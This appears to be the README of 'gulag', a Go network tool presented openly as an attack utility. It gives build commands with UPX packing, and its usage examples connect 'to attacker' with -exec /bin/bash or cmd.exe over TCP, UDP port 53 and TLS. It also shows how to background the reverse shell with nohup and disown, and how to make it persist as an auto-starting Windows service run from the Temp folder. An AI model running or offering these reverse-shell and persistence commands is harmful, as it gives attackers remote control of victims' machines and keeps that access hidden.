# gulag
Simple network tool in pure Go

## Why?
you know i mean it

## Build on Linux

### For Linux
```bash
git clone https://gitlab.com/vay3t/gulag
cd gulag
GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -trimpath gulag.go
upx gulag
```

### For Windows
```bash
git clone https://gitlab.com/vay3t/gulag
cd gulag
GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -trimpath gulag.go
upx gulag.exe
```

### For MacOS
```bash
git clone https://gitlab.com/vay3t/gulag
cd gulag
GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -trimpath gulag.go
upx gulag
```

### For Docker

```bash
git clone https://gitlab.com/vay3t/gulag
cd gulag
docker built -t gulag .
```

## Usage

### Help
```
Usage of ./gulag:
  -cert string
        trusted CA certificate. Need proto: tls. Ex: cert.pem
  -exec string
        command to execute
  -fwd string
        forward to remote host. Ex: target:port
  -host string
        host to connect to
  -key string
        trusted CA certificate. Need proto tls. Ex: key.pem
  -listen
        listen for incoming connections
  -port int
        port to connect to (default 4444)
  -proto string
        protocol to use, [tcp, udp, tls, fwd] (default "tcp")
  -timeout duration
        timeout in seconds (default 30s)
```

### Examples

#### Client

* Connect to attacker in port **4444/TCP** with shell

```bash
./gulag -host <IP SERVER> -exec /bin/bash
```

* Connect to attacker in port **53/UDP** with shell

```bash
./gulag -host <IP SERVER> -port 53 -proto udp -exec /bin/bash
```

* Connect to attacker in port **4444/TCP** without shell

```bash
./gulag -host <IP SERVER>
```

* Connect to attacker in port **53/UDP** without shell

```bash
./gulag -host <IP SERVER> -port 53 -proto udp
```

* Connect TLS to Banner Grabbing **HTTPS** Server

```bash
./gulag -host <IP SERVER> -port 443 -proto tls
GET / HTTP/1.1
Host: <TARGET>
```

* Connect TLS to attacker machine in port **8443/TCP**
```bash
./gulag -host <IP SERVER> -port 8443 -proto tls -cert /path/to/cert.pem
```


#### Server

* Open port **4444/TCP** in Listen mode

```bash
./gulag -listen
```

* Open port **53/UDP** in Listen mode

```bash
sudo ./gulag -listen -port 53 -proto udp
```

* Open port **8443/TLS** in Listen mode with a custom certificate

```bash 
sudo ./gulag -listen -port 8443 -proto tls -cert /path/to/cert.pem -key /path/to/key.pem
```

* Port forward from port **80/TCP** to **8080/TCP**

```bash
./gulag -listen -port 8080 -proto fwd -fwd "server:80"
```


#### Run background reverse shell

##### Linux

- nohup

```bash
nohup ./gulag -host <IP SERVER> -exec /bin/bash >/dev/null 2>&1 &
```

- disown

```bash
./gulag -host <IP SERVER> -exec /bin/bash >/dev/null 2>&1 & disown
```

##### Windows

- sc

```bat
sc.exe create gulag binPath="%userprofile%\AppData\Local\Temp\gulag.exe -host <IP SERVER> -exec cmd.exe" DisplayName="gulag" start=auto
```

##### Docker

```bash
docker run -ti -p 31337:31337 --rm gulag -listen -port 31337
```
